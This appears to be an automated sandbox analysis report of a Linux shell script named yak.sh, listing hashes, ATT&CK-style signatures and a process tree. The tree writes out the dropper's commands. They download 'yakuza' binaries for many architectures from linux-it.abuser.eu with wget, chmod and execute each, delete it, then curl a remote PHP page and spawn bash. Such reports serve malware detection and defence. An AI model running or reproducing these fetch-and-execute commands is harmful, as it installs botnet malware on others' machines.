ca0bd413a34399accc6f62506ac94f9c7e1fd5c4efa49d1627eed568b1de78bf

Analysis

max time kernel
149s
max time network
7s
platform
debian-9_armhf
resource
debian9-armhf-20240729-en
resource tags

arch:armhfimage:debian9-armhf-20240729-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
24-11-2024 00:00

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

yak.sh
Size

2KB
MD5

f50f60f970a5203dad27c480da7b4519
SHA1

f50f26900efe72f11c37767b5db9a3916a7c76b4
SHA256

ca0bd413a34399accc6f62506ac94f9c7e1fd5c4efa49d1627eed568b1de78bf
SHA512

40c118ed8e7b22ba4c439cc3de9a9d69d7cccd9b4d109b00a716ea564379e001304edaffb0f9ca143e87cb0138f566aebea2e998b76c9bb4b653cf7a191e4ddd

Score

7^/10

antivm defense_evasion discovery

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 13 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

Processes:

chmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmod

pid	Process
656	chmod
667	chmod
694	chmod
706	chmod
710	chmod
720	chmod
726	chmod
676	chmod
682	chmod
689	chmod
698	chmod
702	chmod
714	chmod

Checks CPU configuration 1 TTPs 1 IoCs

Checks CPU information which indicate if the system is a virtual machine.

antivm

System Checks

T1497.001

Processes:

curl

description	ioc	Process
File opened for reading	/proc/cpuinfo	curl

Reads runtime system information 2 IoCs

Reads data from /proc virtual filesystem.

discovery

Processes:

curl

description	ioc	Process
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl

System Network Configuration Discovery 1 TTPs 6 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

Processes:

rmwgetyakuza.mipselrmwgetyakuza.mips

pid	Process
659	rm
662	wget
669	yakuza.mipsel
671	rm
647	wget
658	yakuza.mips

/tmp/yak.sh
/tmp/yak.sh
1⤵
PID:645
- /usr/bin/wget
  wget http://linux-it.abuser.eu/yakuza.mips
  2⤵
  - System Network Configuration Discovery
  PID:647
- /bin/chmod
  chmod +x yakuza.mips
  2⤵
  - File and Directory Permissions Modification
  PID:656
- /tmp/yakuza.mips
  ./yakuza.mips
  2⤵
  - System Network Configuration Discovery
  PID:658
- /bin/rm
  rm -rf yakuza.mips
  2⤵
  - System Network Configuration Discovery
  PID:659
- /usr/bin/wget
  wget http://linux-it.abuser.eu/yakuza.mipsel
  2⤵
  - System Network Configuration Discovery
  PID:662
- /bin/chmod
  chmod +x yakuza.mipsel
  2⤵
  - File and Directory Permissions Modification
  PID:667
- /tmp/yakuza.mipsel
  ./yakuza.mipsel
  2⤵
  - System Network Configuration Discovery
  PID:669
- /bin/rm
  rm -rf yakuza.mipsel
  2⤵
  - System Network Configuration Discovery
  PID:671
- /usr/bin/wget
  wget http://linux-it.abuser.eu/yakuza.sh
  2⤵
  PID:673
- /bin/chmod
  chmod +x yakuza.sh
  2⤵
  - File and Directory Permissions Modification
  PID:676
- /tmp/yakuza.sh
  ./yakuza.sh
  2⤵
  PID:677
- /bin/rm
  rm -rf yakuza.sh
  2⤵
  PID:678
- /usr/bin/wget
  wget http://linux-it.abuser.eu/yakuza.x86
  2⤵
  PID:680
- /bin/chmod
  chmod +x yakuza.x86
  2⤵
  - File and Directory Permissions Modification
  PID:682
- /tmp/yakuza.x86
  ./yakuza.x86
  2⤵
  PID:684
- /bin/rm
  rm -rf yakuza.x86
  2⤵
  PID:685
- /usr/bin/wget
  wget http://linux-it.abuser.eu/yakuza.arm6
  2⤵
  PID:687
- /bin/chmod
  chmod +x yakuza.arm6
  2⤵
  - File and Directory Permissions Modification
  PID:689
- /tmp/yakuza.arm6
  ./yakuza.arm6
  2⤵
  PID:690
- /bin/rm
  rm -rf yakuza.arm6
  2⤵
  PID:691
- /usr/bin/wget
  wget http://linux-it.abuser.eu/yakuza.i686
  2⤵
  PID:692
- /bin/chmod
  chmod +x yakuza.i686
  2⤵
  - File and Directory Permissions Modification
  PID:694
- /tmp/yakuza.i686
  ./yakuza.i686
  2⤵
  PID:695
- /bin/rm
  rm -rf yakuza.i686
  2⤵
  PID:696
- /usr/bin/wget
  wget http://linux-it.abuser.eu/yakuza.ppc
  2⤵
  PID:697
- /bin/chmod
  chmod +x yakuza.ppc
  2⤵
  - File and Directory Permissions Modification
  PID:698
- /tmp/yakuza.ppc
  ./yakuza.ppc
  2⤵
  PID:699
- /bin/rm
  rm -rf yakuza.ppc
  2⤵
  PID:700
- /usr/bin/wget
  wget http://linux-it.abuser.eu/yakuza.i586
  2⤵
  PID:701
- /bin/chmod
  chmod +x yakuza.i586
  2⤵
  - File and Directory Permissions Modification
  PID:702
- /tmp/yakuza.i586
  ./yakuza.i586
  2⤵
  PID:703
- /bin/rm
  rm -rf yakuza.i586
  2⤵
  PID:704
- /usr/bin/wget
  wget http://linux-it.abuser.eu/yakuza.m68k
  2⤵
  PID:705
- /bin/chmod
  chmod +x yakuza.m68k
  2⤵
  - File and Directory Permissions Modification
  PID:706
- /tmp/yakuza.m68k
  ./yakuza.m68k
  2⤵
  PID:707
- /bin/rm
  rm -rf yakuza.m68k
  2⤵
  PID:708
- /usr/bin/wget
  wget http://linux-it.abuser.eu/yakuza.arm4
  2⤵
  PID:709
- /bin/chmod
  chmod +x yakuza.arm4
  2⤵
  - File and Directory Permissions Modification
  PID:710
- /tmp/yakuza.arm4
  ./yakuza.arm4
  2⤵
  PID:711
- /bin/rm
  rm -rf yakuza.arm4
  2⤵
  PID:712
- /usr/bin/wget
  wget http://linux-it.abuser.eu/yakuza.arm5
  2⤵
  PID:713
- /bin/chmod
  chmod +x yakuza.arm5
  2⤵
  - File and Directory Permissions Modification
  PID:714
- /tmp/yakuza.arm5
  ./yakuza.arm5
  2⤵
  PID:715
- /bin/rm
  rm -rf yakuza.arm5
  2⤵
  PID:716
- /usr/bin/wget
  wget http://linux-it.abuser.eu/yakuza.arm7
  2⤵
  PID:717
- /bin/chmod
  chmod +x yakuza.arm7
  2⤵
  - File and Directory Permissions Modification
  PID:720
- /tmp/yakuza.arm7
  ./yakuza.arm7
  2⤵
  PID:721
- /bin/rm
  rm -rf yakuza.arm7
  2⤵
  PID:722
- /usr/bin/wget
  wget http://linux-it.abuser.eu/yakuza.sparc
  2⤵
  PID:724
- /bin/chmod
  chmod +x yakuza.sparc
  2⤵
  - File and Directory Permissions Modification
  PID:726
- /tmp/yakuza.sparc
  ./yakuza.sparc
  2⤵
  PID:728
- /bin/rm
  rm -rf yakuza.sparc
  2⤵
  PID:729
- /usr/bin/curl
  curl -s http://linux-it.abuser.eu/test.php
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  PID:731
- /bin/bash
  bash
  2⤵
  PID:732